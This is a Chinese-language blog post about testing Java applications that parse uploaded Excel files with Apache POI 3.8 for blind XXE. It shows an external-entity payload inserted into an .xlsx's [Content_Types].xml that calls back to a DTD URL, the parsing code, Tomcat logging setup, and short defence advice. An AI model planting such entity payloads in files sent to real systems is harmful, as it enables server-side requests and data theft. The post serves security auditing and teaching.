码迷,mamicode.com
首页 > 其他好文 > 详细

Excel中的XXE攻击

时间:2020-05-04 13:07:15      阅读:150      评论:0      收藏:0      [点我收藏+]

标签:网站   rop   sed   技术   @param   tomcat   cat   jar包   攻击   

技术图片

最近在审计某银行的Java代码时,发现许多上传Excel文件的接口,允许后缀是xslx文件,xslx文件是由xml文件组成的,可以改成.zip的文件后缀名进行解压,所以如果如果没有禁用外部实体,会存在XXE漏洞。下面的测试使用Java语言进行blind-xxe测试。

1、测试环境

解析Excel文件:poi-3.8。
因为测试没有会先,所以利用Spring Boot搭建测试网站,查看日志是否有触发漏洞。

2、修改xslx

利用360压缩打开xslx文件,找到Content_Types.xml文件,添加外部实体如下:
实体的值:

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://127.0.0.1/test.dtd"> ]>
<x>&xxe;</x>

技术图片

3、测试代码(读取Excel文件)

package com.itkim.tool;

import org.apache.poi.xssf.usermodel.XSSFRow;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;

import java.io.FileInputStream;

/**
 * @description: 读取Excel文件
 * @author: KimJun
 * @date: 19.10.5 23:27
 */
public class ExcelData {

    private XSSFSheet sheet;

    /**
     * 构造函数,初始化excel数据
     *
     * @param filePath  excel路径
     * @param sheetName sheet表名
     */
    ExcelData(String filePath, String sheetName) throws Exception {
        FileInputStream fileInputStream = null;
            fileInputStream = new FileInputStream(filePath);
            XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
            //获取sheet
            sheet = sheets.getSheet(sheetName);

    }

    //打印excel数据
    public void readExcelData() {
        //获取行数
        int rows = sheet.getPhysicalNumberOfRows();
        for (int i = 0; i < rows; i++) {
            //获取列数
            XSSFRow row = sheet.getRow(i);
            int columns = row.getPhysicalNumberOfCells();
            for (int j = 0; j < columns; j++) {
                String cell = row.getCell(j).toString();
                System.out.println(cell);
            }
        }
    }

    //测试方法
    public static void main(String[] args) throws Exception {
        ExcelData sheet1 = new ExcelData("C:\\Users\\I\\Desktop\\test3.xlsx", "Sheet1");
        sheet1.readExcelData();
    }
}

4、测试

在我们的resources/static目录写一个test.dtd文件,启动我们的Tomcat服务器,因为我们使用的是Spring Boot内置的Tomcat,所以我们需要在application.properproperties中设置生成日志文件的位置,然后就可以启动服务器了。

server.port=8080

server.tomcat.accesslog.enabled=true
server.tomcat.accesslog.suffix=.log
server.tomcat.accesslog.prefix=access_log
server.tomcat.accesslog.file-date-format=.yyyy-MM-dd
server.tomcat.basedir=Z:\\springboot-tomcat-log
server.tomcat.accesslog.directory=logs

logging.level.org.apache.tomcat=DEBUG
logging.level.org.apache.catalina=DEBUG

跑一下我们的读取Excel的程序,查看Tomcat的日志如下:
技术图片

可以看到Tomcat接收到请求,证明存在XXE漏洞。

5、防御

  • 禁用外部实体注入
  • 升级较新的jar包,进行代码审计工作

Excel中的XXE攻击

标签:网站   rop   sed   技术   @param   tomcat   cat   jar包   攻击   

原文地址:https://www.cnblogs.com/kimjun/p/12826066.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!